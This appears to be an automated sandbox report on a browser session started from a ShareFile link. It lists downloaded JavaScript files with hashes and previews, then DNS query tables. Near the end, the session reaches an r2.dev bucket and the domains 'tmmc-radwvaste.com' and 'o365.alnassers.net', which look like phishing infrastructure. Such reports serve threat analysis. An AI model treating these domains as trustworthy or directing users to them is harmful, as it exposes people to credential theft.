                                                                                                                                                                                                                      SHA-512:BAAD17C762461527B270B57EF294E28BEFF92B3A66829B8DDD8788A791AEBB0A40BE849BFC79FCFC5CB0D7FFC7FD709CA6CD6A61CAC878CE60F585D40F214970
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:!function(t,n,e){function r(e,o){if(!n[e]){if(!t[e]){var a="function"==typeof __nr_require&&__nr_require;if(!o&&a)return a(e,!0);if(i)return i(e,!0);throw new Error("Cannot find module '"+e+"'")}var s=n[e]={exports:{}};t[e][0].call(s.exports,function(n){var i=t[e][1][n];return r(i||n)},s,s.exports)}return n[e].exports}for(var i="function"==typeof __nr_require&&__nr_require,o=0;o<e.length;o++)r(e[o]);return r}({1:[function(t,n,e){var r=t(46);n.exports=function(t,n){return"addEventListener"in window?window.addEventListener(t,n,r(!1)):"attachEvent"in window?window.attachEvent("on"+t,n):void 0}},{}],2:[function(t,n,e){function r(t,n,e,r){var i=d(t,n,e);return i.stats=a(r,i.stats),i}function i(t,n,e,r,i){var a=d(t,n,e,i);return a.metrics=o(r,a.metrics),a}function o(t,n){return n||(n={count:0}),n.count+=1,v(t,function(t,e){n[t]=a(e,n[t])}),n}function a(t,n){return null==t?s(n):n?(n.c||(n=f(n.t)),n.c+=1,n.t+=t,n.sos+=t*t,t>n.max&&(n.max=t),t<n.min&&(n.min=t),n):{t:t}}function s(t){return t?t.
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65471)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):308129
                                                                                                                                                                                                                      Entropy (8bit):5.532445628001004
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:S1o5EWGKEsOxBriS120AAjWNIGhyBXipChmB1cmX4fFgJGOd4ojx:SHWGKEsOxgAiB4fiwOP
                                                                                                                                                                                                                      MD5:AAA88D2636DFEB090B5625DA19C6583B
                                                                                                                                                                                                                      SHA1:4B2A69A4DBE262EE61A895E662E6FAAB8975747F
                                                                                                                                                                                                                      SHA-256:24100E38A4398127141377D9B7FABCD8EB2F35BF68062306D6F3828133EA7E7B
                                                                                                                                                                                                                      SHA-512:18D0372BC9EB2DAE1664688FE7FFF3B8D9EA987070A6D4C68F9E2036D4DF1A9119766F1CED2070F21744201EFADE8119E1E8885A28AD847BD09E53508678963D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-projects-pilet/2.1.15/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevprojectspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},a={},i={},c={},s={},u={};return Object.defineProperty(a,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.Api=e.Api,n.CapabilitiesEntity=e.CapabilitiesEntity,n.CapabilityName=e.CapabilityName,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.DocumentApprovalWorkflowAction=e.DocumentApprovalWorkflowAction,n.EncryptedEmailsEntity=e.EncryptedEmailsEntity,n.ExceptionReason=e.ExceptionReason,n.FileAction=e.FileAction,n.FileLockEntity=e.FileLockEntity,n.FileVirusStatus=e.FileVirusStatus,n.IntegrationProvider=e.IntegrationProvider,n.IntegrationsEntity=e.IntegrationsEntity,n.ItemOperations=e.ItemOperations,n.ItemOrderingMode=e.ItemOrderingMode,n.ItemsEntity=e.ItemsE
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65472)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):124348
                                                                                                                                                                                                                      Entropy (8bit):5.387460323033051
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:Pr9SpHEVxpUZK4ut5tDu+SeZyFPqb7agGHkoG+cOsOHBf8ag:PRvVxpN4+tqPMOqHOTSb
                                                                                                                                                                                                                      MD5:4E4E4FD0B0580EF04C25C9DB829E370F
                                                                                                                                                                                                                      SHA1:4867DE5753E3320EF0A1AB5FE3E9CD1E4EFBF2F4
                                                                                                                                                                                                                      SHA-256:F699158E6689E3633E4553562FE73AE320E42781263E5E50906725B2E988D8BF
                                                                                                                                                                                                                      SHA-512:1D138579D2E563CE7454147700B13EA52CB487A716B39DA4A4C9E9508F567353DB7149F2F297050DD729A598A275F0014BEEB52EC7CB6844A3C856930B5B1BB4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-task-aggregator-pilet/1.0.23/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevtaskaggregatorpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(s,"__esModule",{value:!0}),{setters:[function(e){n.Api=e.Api,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.ItemOrderingMode=e.ItemOrderingMode,n.ItemsEntity=e.ItemsEntity,n.UsersEntity=e.UsersEntity,n.createFolder=e.createFolder,n.isCustomWorkflowBundle=e.isCustomWorkflowBundle,n.isFile=e.isFile,n.isFolder=e.isFolder,n.isLink=e.isLink,n.isMedicalStudyBundle=e.isMedicalStudyBundle,n.isNote=e.isNote,n.isRequestListBundle=e.isRequestListBundle,n.isSymbolicLink=e.isSymbolicLink,n.isWorkflowBundle=e.isWorkflowBundle},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){o.Avatar=e.Avatar,o.Button=e.Button,o.Card=e.Card,o.Col=e.Col,o.Divider=e.Divider,o.Empty=e.Empty,o.Flex=e.Flex
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65402)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):221391
                                                                                                                                                                                                                      Entropy (8bit):5.505848799267894
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:zKpp9PN6FBP6XHmOMDl1LXPOODKXJ0kouqtHnLM2wRz+BZKGG8cQfGIO8he+uJ8y:zKppRqBPywDlVhkouwnLllOqemP9Pmmg
                                                                                                                                                                                                                      MD5:B5D95B131A56925ED34B1CF110473319
                                                                                                                                                                                                                      SHA1:92E638C9042CEA3E57F02C110ABF2F76B69E7EE2
                                                                                                                                                                                                                      SHA-256:D0AE89E960445A175B51BB797B1EBC7E144A775C377900CF4EAB1B239104A206
                                                                                                                                                                                                                      SHA-512:9AC8D18DB3AFEBCB0E034154D91311411B0831C1BDE1E1DB8384B843E797B170E9880AB04E6E68AE9629E1159A2FE6E5C106E8AE145C9A9337C805B03CBE71B4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevuseractionspilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"}).System.register(["@citrite/citrix-ui@25.46.0","react","react-router"],(function(e,t){var r={},n={},o={};return{setters:[function(e){r.confirmModal=e.confirmModal,r.notifyError=e.notifyError,r.notifySuccess=e.notifySuccess,r.warningConfirmModal=e.warningConfirmModal},function(e){n.createElement=e.createElement,n["default"]=e["default"]},function(e){o.useHistory=e.useHistory}],execute:function(){e((()=>{var e={9669:(e,t,r)=>{e.exports=r(1609)},5448:(e,t,r)=>{"use strict";var n=r(4867),o=r(6026),i=r(4372),s=r(5327),a=r(4097),u=r(4109),c=r(7985),l=r(7874),f=r(2648),d=r(644),p=r(205);e.exports=function(e){return new Promise((function(t,r){var h,g=e.data,m=e.headers,v=e.responseType;function y(){e.cancelToken&&e.cancelToken.unsubscribe(h),e.signal&&e.signal.removeEventListener("abort",h)}n.isFormData(g)&&n.isStandardBrowserEnv()&&delete m["Content-Type"];var b=new XMLHttpRequest;if
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):23
                                                                                                                                                                                                                      Entropy (8bit):3.708132064658602
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:YMEsRa:YMpo
                                                                                                                                                                                                                      MD5:2E3B4BDE9D3F0B12A1B68BF76DEA5B5E
                                                                                                                                                                                                                      SHA1:0EADE51D11409D2C996FFAF140DAAE6AECCC1E6D
                                                                                                                                                                                                                      SHA-256:4E8F3099517F69EADF38031D9284E1F8AB90BEFD6F84C998F79CD9ECEEB53C76
                                                                                                                                                                                                                      SHA-512:E01EA974F92B67BB31A6EA3D977089CC3E961239583B88F1A443DC5659A83B16ADE0A7769F08B69D7BA66052E018A7A824FCB0F172AC630E586574BBC382960B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://api.ipify.org/?format=json
                                                                                                                                                                                                                      Preview:{"ip":"173.254.250.76"}
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65453)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):91744
                                                                                                                                                                                                                      Entropy (8bit):5.35315025267453
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:15K9Coppx4UK/l6XHUlMDltJXhIWDUXjak3//+nOa:15K9CoppmZ/lyLDlGonk3G
                                                                                                                                                                                                                      MD5:EC10A08ABEEA396244C7C88FFAA5ECF7
                                                                                                                                                                                                                      SHA1:29EA05BFC2B2A754AE77DF48FEBAC23A79352C48
                                                                                                                                                                                                                      SHA-256:E4126A1DD61B9AB0EB21038540041710DDCBDCD5E03C0D7C302F74E25EF34B8E
                                                                                                                                                                                                                      SHA-512:23B746B157D1DD8A2896FEDD3A86CDF13A755353FF7F9BB87A339CBE194B844B0EAEE32F038F73254BB355BEA29D02052496B28D0FB29EECA85B2CA29D343B1A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-user-act-hist-pilet/1.7.0/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevuseracthistpilet,{}).System.register(["antd","react","react-dom","tslib"],(function(e,t){var r={},n={},o={},i={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){r.Alert=e.Alert,r.Button=e.Button,r.Modal=e.Modal,r.Skeleton=e.Skeleton,r.Spin=e.Spin,r.Tabs=e.Tabs,r.Tag=e.Tag},function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){o["default"]=e["default"],o.findDOMNode=e.findDOMNode,o.flushSync=e.flushSync},function(e){i.__awaiter=e.__awaiter,i.__rest=e.__rest}],execute:function(){e((()=>{var e,s,a={5916:(e,t,r)=>{"use strict";r.d(t,{XK:()=>C,jK:()=>x});var n=r(8830),o=r.n(n),i=r(4193),s=undefined&&undefined.__assign||function(){return s=Object.assign||function(e){for(var t,r=1,n=arguments.length;r<n;r++)for(var o in t=arguments[r])Object.prototype.hasOwnProperty.call(t,o)&&(e[o]=t[o]);return e},s.apply(this,arguments)};function a(e){return Promise.resolve(o()({method:e.method,url:e.url,withCredential
                                                                                                                                                                                                                      No static file info
                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                      Nov 5, 2024 20:35:58.722549915 CET192.168.2.171.1.1.10x2c09Standard query (0)averellharriman.sharefile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:35:58.724392891 CET192.168.2.171.1.1.10x91Standard query (0)averellharriman.sharefile.com65IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:35:59.888012886 CET192.168.2.171.1.1.10xef03Standard query (0)0093b71e39a6.us-east-1.sdk.awswaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:35:59.888184071 CET192.168.2.171.1.1.10x1ddcStandard query (0)0093b71e39a6.us-east-1.sdk.awswaf.com65IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:01.020896912 CET192.168.2.171.1.1.10x65cStandard query (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:01.021054029 CET192.168.2.171.1.1.10x503bStandard query (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com65IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:01.060964108 CET192.168.2.171.1.1.10x94b1Standard query (0)averellharriman.sharefile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:01.061119080 CET192.168.2.171.1.1.10x4399Standard query (0)averellharriman.sharefile.com65IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:02.624572039 CET192.168.2.171.1.1.10xe8feStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:02.624727011 CET192.168.2.171.1.1.10x5a92Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.089329958 CET192.168.2.171.1.1.10x5111Standard query (0)app.launchdarkly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.089528084 CET192.168.2.171.1.1.10xb13cStandard query (0)app.launchdarkly.com65IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.097284079 CET192.168.2.171.1.1.10x252bStandard query (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.097455025 CET192.168.2.171.1.1.10xc68eStandard query (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com65IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.247256994 CET192.168.2.171.1.1.10xa30eStandard query (0)averellharriman.sf-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.247591019 CET192.168.2.171.1.1.10xdd7eStandard query (0)averellharriman.sf-api.com65IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.248488903 CET192.168.2.171.1.1.10x579eStandard query (0)citrix-sharefile-content.customer.pendo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.248650074 CET192.168.2.171.1.1.10x6d50Standard query (0)citrix-sharefile-content.customer.pendo.io65IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.132781982 CET192.168.2.171.1.1.10xbaf3Standard query (0)citrix-sharefile-content.customer.pendo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.132924080 CET192.168.2.171.1.1.10x9a31Standard query (0)citrix-sharefile-content.customer.pendo.io65IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.338901043 CET192.168.2.171.1.1.10x63efStandard query (0)averellharriman.sf-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.339046955 CET192.168.2.171.1.1.10x90fcStandard query (0)averellharriman.sf-api.com65IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.398787975 CET192.168.2.171.1.1.10x2cdfStandard query (0)piletfeed-cdn.sharefile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.399065018 CET192.168.2.171.1.1.10x80b3Standard query (0)piletfeed-cdn.sharefile.io65IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.447197914 CET192.168.2.171.1.1.10xa42cStandard query (0)app.launchdarkly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.447357893 CET192.168.2.171.1.1.10xc4abStandard query (0)app.launchdarkly.com65IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.740504980 CET192.168.2.171.1.1.10xdc74Standard query (0)o49063.ingest.sentry.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.740652084 CET192.168.2.171.1.1.10x8e90Standard query (0)o49063.ingest.sentry.io65IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:06.951724052 CET192.168.2.171.1.1.10x4bcdStandard query (0)o49063.ingest.sentry.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:06.951884985 CET192.168.2.171.1.1.10xee40Standard query (0)o49063.ingest.sentry.io65IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:06.997925043 CET192.168.2.171.1.1.10xc369Standard query (0)piletfeed-cdn.sharefile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:06.998183966 CET192.168.2.171.1.1.10x280dStandard query (0)piletfeed-cdn.sharefile.io65IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:24.315792084 CET192.168.2.171.1.1.10xfa14Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:26.745218992 CET192.168.2.171.1.1.10x18feStandard query (0)averellharriman.sharefile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:27.888331890 CET192.168.2.171.1.1.10xf9adStandard query (0)averellharriman.sf-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:27.890824080 CET192.168.2.171.1.1.10xe3bdStandard query (0)js-agent.newrelic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:27.892446041 CET192.168.2.171.1.1.10x7796Standard query (0)events.launchdarkly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:28.885541916 CET192.168.2.171.1.1.10xf0bStandard query (0)bam.nr-data.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:30.000893116 CET192.168.2.171.1.1.10xc6a1Standard query (0)citrix-sharefile-data.customer.pendo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:31.015531063 CET192.168.2.171.1.1.10xdfa4Standard query (0)citrix-sharefile-content.customer.pendo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:33.010678053 CET192.168.2.171.1.1.10x8730Standard query (0)piletfeed-cdn.sharefile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:35.179723978 CET192.168.2.171.1.1.10xd796Standard query (0)sf-cv.sharefile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:47.262864113 CET192.168.2.171.1.1.10x633eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:47.263675928 CET192.168.2.171.1.1.10xde2Standard query (0)sf-renderx-us-east-1.sharefile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:52.262356043 CET192.168.2.171.1.1.10xe7a2Standard query (0)sf-temp-us-east-1-production.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:57.923259020 CET192.168.2.171.1.1.10xafb9Standard query (0)pub-10305130932840cc9846324aa165bbf7.r2.devA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:37:01.227241993 CET192.168.2.171.1.1.10x7917Standard query (0)tmmc-radwvaste.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:37:02.123692989 CET192.168.2.171.1.1.10x40acStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:37:02.680805922 CET192.168.2.171.1.1.10x7b93Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:37:03.142874956 CET192.168.2.171.1.1.10xf3c1Standard query (0)o365.alnassers.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:37:04.140363932 CET192.168.2.171.1.1.10x2a4cStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:37:07.332000971 CET192.168.2.171.1.1.10x9263Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                      Nov 5, 2024 20:35:58.742618084 CET1.1.1.1192.168.2.170x2c09No error (0)averellharriman.sharefile.com13.248.193.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:35:58.742618084 CET1.1.1.1192.168.2.170x2c09No error (0)averellharriman.sharefile.com76.223.1.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:35:59.909234047 CET1.1.1.1192.168.2.170xef03No error (0)0093b71e39a6.us-east-1.sdk.awswaf.com13.32.121.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:35:59.909234047 CET1.1.1.1192.168.2.170xef03No error (0)0093b71e39a6.us-east-1.sdk.awswaf.com13.32.121.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:35:59.909234047 CET1.1.1.1192.168.2.170xef03No error (0)0093b71e39a6.us-east-1.sdk.awswaf.com13.32.121.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:35:59.909234047 CET1.1.1.1192.168.2.170xef03No error (0)0093b71e39a6.us-east-1.sdk.awswaf.com13.32.121.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:01.031927109 CET1.1.1.1192.168.2.170x65cNo error (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com18.239.18.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:01.031927109 CET1.1.1.1192.168.2.170x65cNo error (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com18.239.18.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:01.031927109 CET1.1.1.1192.168.2.170x65cNo error (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com18.239.18.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:01.031927109 CET1.1.1.1192.168.2.170x65cNo error (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com18.239.18.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:01.074942112 CET1.1.1.1192.168.2.170x94b1No error (0)averellharriman.sharefile.com76.223.1.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:01.074942112 CET1.1.1.1192.168.2.170x94b1No error (0)averellharriman.sharefile.com13.248.193.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:02.633325100 CET1.1.1.1192.168.2.170x5a92No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:02.633337975 CET1.1.1.1192.168.2.170xe8feNo error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.101258039 CET1.1.1.1192.168.2.170xb13cNo error (0)app.launchdarkly.comc3.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.103893995 CET1.1.1.1192.168.2.170x5111No error (0)app.launchdarkly.comc3.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.111944914 CET1.1.1.1192.168.2.170x252bNo error (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com18.245.175.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.111944914 CET1.1.1.1192.168.2.170x252bNo error (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com18.245.175.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.111944914 CET1.1.1.1192.168.2.170x252bNo error (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com18.245.175.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.111944914 CET1.1.1.1192.168.2.170x252bNo error (0)0093b71e39a6.11de9b12.us-east-1.token.awswaf.com18.245.175.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.267393112 CET1.1.1.1192.168.2.170xa30eNo error (0)averellharriman.sf-api.com13.248.193.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.267393112 CET1.1.1.1192.168.2.170xa30eNo error (0)averellharriman.sf-api.com76.223.1.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.323407888 CET1.1.1.1192.168.2.170x579eNo error (0)citrix-sharefile-content.customer.pendo.io5352587489443840-content.customer.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.323407888 CET1.1.1.1192.168.2.170x579eNo error (0)5352587489443840-content.customer.pendo.iocdn-cname.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.323407888 CET1.1.1.1192.168.2.170x579eNo error (0)cdn-cname.pendo.io51.138.111.34.bc.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.323407888 CET1.1.1.1192.168.2.170x579eNo error (0)51.138.111.34.bc.googleusercontent.com34.111.138.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.336040020 CET1.1.1.1192.168.2.170x6d50No error (0)citrix-sharefile-content.customer.pendo.io5352587489443840-content.customer.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.336040020 CET1.1.1.1192.168.2.170x6d50No error (0)5352587489443840-content.customer.pendo.iocdn-cname.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:03.336040020 CET1.1.1.1192.168.2.170x6d50No error (0)cdn-cname.pendo.io51.138.111.34.bc.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.141397953 CET1.1.1.1192.168.2.170xbaf3No error (0)citrix-sharefile-content.customer.pendo.io5352587489443840-content.customer.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.141397953 CET1.1.1.1192.168.2.170xbaf3No error (0)5352587489443840-content.customer.pendo.iocdn-cname.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.141397953 CET1.1.1.1192.168.2.170xbaf3No error (0)cdn-cname.pendo.io51.138.111.34.bc.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.141397953 CET1.1.1.1192.168.2.170xbaf3No error (0)51.138.111.34.bc.googleusercontent.com34.111.138.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.186049938 CET1.1.1.1192.168.2.170x9a31No error (0)citrix-sharefile-content.customer.pendo.io5352587489443840-content.customer.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.186049938 CET1.1.1.1192.168.2.170x9a31No error (0)5352587489443840-content.customer.pendo.iocdn-cname.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.186049938 CET1.1.1.1192.168.2.170x9a31No error (0)cdn-cname.pendo.io51.138.111.34.bc.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.357058048 CET1.1.1.1192.168.2.170x63efNo error (0)averellharriman.sf-api.com13.248.193.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.357058048 CET1.1.1.1192.168.2.170x63efNo error (0)averellharriman.sf-api.com76.223.1.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.408660889 CET1.1.1.1192.168.2.170x2cdfNo error (0)piletfeed-cdn.sharefile.io13.227.219.30A (IP address)IN (0x0001)false
